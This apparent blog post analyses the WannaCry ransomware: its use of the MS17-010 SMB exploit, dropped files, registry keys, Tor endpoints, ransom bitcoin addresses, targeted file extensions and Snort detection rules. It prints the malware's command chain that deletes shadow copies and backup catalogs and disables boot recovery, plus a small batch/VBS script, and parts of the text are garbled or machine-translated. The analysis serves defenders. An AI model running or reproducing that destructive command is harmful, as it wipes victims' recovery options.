I am a general technical coder. If the analysis is not in place, please point out that the analysis of this software is only for research from a security perspective; please do not use it illegally, the tool will not be made public, everyone is interested in visiting my blog, liberxue blog: please do not use this article Reprinted by liberxue
Reference source:
https://gist.github.com/msuiche/691e52fd5f0d8b760080640687e23d60 https://github.com/countercept/doublepulsar-detection-script/blob/master/detect_doublepulsar_smb.py
https://gist.github.com/msuiche/691e52fd5f0d8b760080640687e23d60
Complement encryption using AES/RSA
Packets and checks are very similar to DOUBLEPULSAR detection tools written by reverse
###About WannaCry exploiting MS17-010:
Malware is being distributed using the MS17-010 vulnerability. This is an SMB with Remote Code Execution option - Details: Microsoft Security Bulletin MS17-010 - Critical. The exploit code is available on several sites, including [:MS17-010](https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb
This exploit, also known as the ETERNALBLUE exploit for Equations, was part of the FuzzBunch toolkit released by Shadow Brokers a few weeks ago.
With MS17-010, an attacker can only use one exploit to gain ](http://) remote access with system privileges, which means two steps (remote code execution + local privilege escalation combination) using only one bug in the SMB protocol . Analyze exploit code in Metasploit, a well-known tool for hacking, exploit 'KI_USER_SHARED_DATA', which has a fixed memory address (0xffdff000 on 32-bit Windows) in order to later copy the payload and control the transfer the right to it.
By remotely gaining control of a victim PC with system privileges, without any user action, an attacker can control malware in the local network by taking control of one system within that network (controlling all systems not affected by this vulnerability) , and in this case a system will spread ransomware in this case and all those Windows systems will be vulnerable instead of patching MS17-010.
working process
Volume shadow copies and backups are removed by using the command line command:
Cmd / c vssadmin delete shadows / all / quiet&wmic shadowcopy delete&bcdedit / set {default} bootstatuspolicy ignoreallfailures&bcdedit / set {default} recoveryenabled no&wbadmin delete catalog -quiet
Ransomware writes itself into a random character folder in the "ProgramData" folder with the filename "tasksche.exe", or in the C:\Windows folder with the filenames "mssecsvc.exe" and "tasksche.exe" middle.
Simple chestnuts:
C:\ ProgramData \ abc \ tasksche.exe
C:\ ProgramData \ 360 \ tasksche.exe
C:/ProgramData/wps/tasksche.exe
Do it with batch script:
batch execution.bat
Content of Batch-file (fefe6b30d0819f1a1775e14730a10e0e)
echo off
echo SET ow = WScript.CreateObject(“WScript.Shell”)> m.vbs
echo SET om = ow.CreateShortcut(“C:\
WanaDecryptor
.exe.lnk”)>> m.vbs
echo om.TargetPath = “C:\
WanaDecryptor
.exe”>> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0
Content of ‘M.vbs’
SET ow = WScript.CreateObject(“WScript.Shell”)
SET om = ow.CreateShortcut(“C:\
WanaDecryptor
.exe.lnk”)
om.TargetPath = “C:\
WanaDecryptor
om.Save
SNORT rules:
alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)”; flow:to_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)
alert smb $HOME_NET any -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)
Sans's snort rules:
alert tcp $HOME_NET 445 -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)
Files associated with Wana Decrypt0r/WanaCrypt0r:
[Installed_Folder]\00000000.eky
[Installed_Folder]\00000000.pky
[Installed_Folder]\00000000.res
[Installed_Folder]\@[email protected]
[Installed_Folder]\@[email protected]
[Installed_Folder]\b.wnry
[Installed_Folder]\c.wnry
[Installed_Folder]\f.wnry
[Installed_Folder]\msg\
[Installed_Folder]\msg\m_bulgarian.wnry
[Installed_Folder]\msg\m_chinese (simplified).wnry
[Installed_Folder]\msg\m_chinese (traditional).wnry
[Installed_Folder]\msg\m_croatian.wnry
[Installed_Folder]\msg\m_czech.wnry
[Installed_Folder]\msg\m_danish.wnry
[Installed_Folder]\msg\m_dutch.wnry
[Installed_Folder]\msg\m_english.wnry
[Installed_Folder]\msg\m_filipino.wnry
[Installed_Folder]\msg\m_finnish.wnry
[Installed_Folder]\msg\m_french.wnry
[Installed_Folder]\msg\m_german.wnry
[Installed_Folder]\msg\m_greek.wnry
[Installed_Folder]\msg\m_indonesian.wnry
[Installed_Folder]\msg\m_italian.wnry
[Installed_Folder]\msg\m_japanese.wnry
[Installed_Folder]\msg\m_korean.wnry
[Installed_Folder]\msg\m_latvian.wnry
[Installed_Folder]\msg\m_norwegian.wnry
[Installed_Folder]\msg\m_polish.wnry
[Installed_Folder]\msg\m_portuguese.wnry
[Installed_Folder]\msg\m_romanian.wnry
[Installed_Folder]\msg\m_russian.wnry
[Installed_Folder]\msg\m_slovak.wnry
[Installed_Folder]\msg\m_spanish.wnry
[Installed_Folder]\msg\m_swedish.wnry
[Installed_Folder]\msg\m_turkish.wnry
[Installed_Folder]\msg\m_vietnamese.wnry
[Installed_Folder]\r.wnry
[Installed_Folder]\s.wnry
[Installed_Folder]\t.wnry
[Installed_Folder]\TaskData\
[Installed_Folder]\TaskData\Data\
[Installed_Folder]\TaskData\Data\Tor\
[Installed_Folder]\TaskData\Tor\
[Installed_Folder]\TaskData\Tor\libeay32.dll
[Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
[Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
[Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
[Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
[Installed_Folder]\TaskData\Tor\libssp-0.dll
[Installed_Folder]\TaskData\Tor\ssleay32.dll
[Installed_Folder]\TaskData\Tor\taskhsvc.exe
[Installed_Folder]\TaskData\Tor\tor.exe
[Installed_Folder]\TaskData\Tor\zlib1.dll
[Installed_Folder]\taskdl.exe
[Installed_Folder]\taskse.exe
[Installed_Folder]\u.wnry
[Installed_Folder]\wcry.exe
Registry keys associated with Wana Decrypt0r/WanaCrypt0r:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random] "[Installed_Folder]\tasksche.exe"
HKCU\Software\WanaCrypt0r\
HKCU\Software\WanaCrypt0r\wd [Installed_Folder]
HKCU\Control Panel\Desktop\Wallpaper "[Installed_Folder]\Desktop\@[email protected]"
Wana's network communication Decrypt0r / WanaCrypt0r:
gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion
cwwnhwhlz52maqm7.onion
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
The address of the Tor endpoint recovered from the configuration file:
gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion
cwwnhwhlz52maqm7.onion
软件还会下载tor浏览器的0.2.9.10版本:https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
The Ransomware grants full access to all files by using the following command:
The file size of the ransomware is 3.4 MB (3514368 bytes)
The dropper extracts the ransom-containing password ("WNcry@2ol7") archive from its resources (XIA/2058).
payment address
The ransom will receive payments using 3 different addresses:
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
If interested check how much the payment link: Bitcoin Address 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Bitcoin Address 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Bitcoin Address 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
diagram
]
g - 此文件夹包含描述赎金器不同说明的RTF。共计28种语言。
b.wnry - BMP图像用作恶意软件替代的背景图像。
c.wnry - 包含目标地址的配置文件,还包括tor通信端点信息。
s.wnry - Tor客户端与上述端点进行通信。
u.wnry - ransom-ware的UI界面,包含通信例程和密码验证(目前正在分析)
t.wnry - “WANACRY!”文件 - 包含默认键
r.wnry - Q&A file taskdl.exe / taskse.exe used by applications containing payment instructions -
encryption process
Below is a list of 179 different types of files encrypted by the ransom.
- “.doc”
- “.docx”
- “.docb”
- “.docm”
- “.dot”
- “.dotm”
- “.dotx”
- “.xls”
- “.xlsx”
- “.xlsm”
- “.xlsb”
- “.xlw”
- “.xlt”
- “.xlm”
- “.xlc”
- “.xltx”
- “.xltm”
- “.ppt”
- “.pptx”
- “.pptm”
- “.pot”
- “.pps”
- “.ppsm”
- “.ppsx”
- “.ppam”
- “.potx”
- “.potm”
- “.pst”
- “.ost”
- “.msg”
- “.eml”
- “.edb”
- “.vsd”
- “.vsdx”
- “.txt”
- “.csv”
- “.rtf”
- “.123”
- “.wks”
- “.wk1”
- “.pdf”
- “.dwg”
- “.onetoc2”
- “.snt”
- “.hwp”
- “.602”
- “.sxi”
- “.sti”
- “.sldx”
- “.sldm”
- “.sldm”
- “.vdi”
- “.vmdk”
- “.vmx”
- “.gpg”
- “.aes”
- “.ARC”
- “.PAQ”
- “.bz2”
- “.tbk”
- “.bak”
- “.tar”
- “.tgz”
- “.gz”
- “.7z”
- “.rar”
- “.zip”
- “.backup”
- “.iso”
- “.vcd”
- “.jpeg”
- “.jpg”
- “.bmp”
- “.png”
- “.gif”
- “.raw”
- “.cgm”
- “.tif”
- “.tiff”
- “.nef”
- “.psd”
- “.ai”
- “.svg”
- “.djvu”
- “.m4u”
- “.m3u”
- “.mid”
- “.wma”
- “.flv”
- “.3g2”
- “.mkv”
- “.3gp”
- “.mp4”
- “.mov”
- “.avi”
- “.asf”
- “.mpeg”
- “.vob”
- “.mpg”
- “.wmv”
- “.fla”
- “.swf”
- “.wav”
- “.mp3”
- “.sh”
- “.class”
- “.jar”
- “.java”
- “.rb”
- “.asp”
- “.php”
- “.jsp”
- “.brd”
- “.sch”
- “.dch”
- “.dip”
- “.pl”
- “.vb”
- “.vbs”
- “.ps1”
- “.bat”
- “.cmd”
- “.js”
- “.asm”
- “.h”
- “.pas”
- “.cpp”
- “.c”
- “.cs”
- “.suo”
- “.sln”
- “.ldf”
- “.mdf”
- “.ibd”
- “.myi”
- “.myd”
- “.frm”
- “.odb”
- “.dbf”
- “.db”
- “.mdb”
- “.accdb”
- “.sql”
- “.sqlitedb”
- “.sqlite3”
- “.asc”
- “.lay6”
- “.lay”
- “.mml”
- “.sxm”
- “.otg”
- “.odg”
- “.uop”
- “.std”
- “.sxd”
- “.otp”
- “.odp”
- “.wb2”
- “.slk”
- “.dif”
- “.stc”
- “.sxc”
- “.ots”
- “.ods”
- “.3dm”
- “.max”
- “.3ds”
- “.uot”
- “.stw”
- “.sxw”
- “.ott”
- “.odt”
- “.pem”
- “.p12”
- “.csr”
- “.crt”
- “.key”
- “.pfx”
- “.der”
